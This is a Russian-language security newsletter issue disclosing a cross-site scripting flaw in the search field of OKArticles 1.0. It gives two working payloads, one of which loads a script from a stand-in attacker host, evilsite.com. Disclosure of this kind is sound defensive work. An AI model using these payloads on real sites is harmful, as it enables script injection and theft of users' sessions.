Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в OKArticles.


Компьютер для продвинутых пользователей
В этом выпуске:
OKArticles
ПО: OKArticles
Версия: 1.0
Сайт: http://www.okscripts.com/

Уязвимость:
Поле поиска не обрабатывается и не фильтруется до выполнения. Это можно использовать для XSS атаки.
Использование:
В поле поиска введите код: IMG SRC=javascript:alert('XSS')
Через ссылку: http://www.example.com/okarticles/demo/search.php?q=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное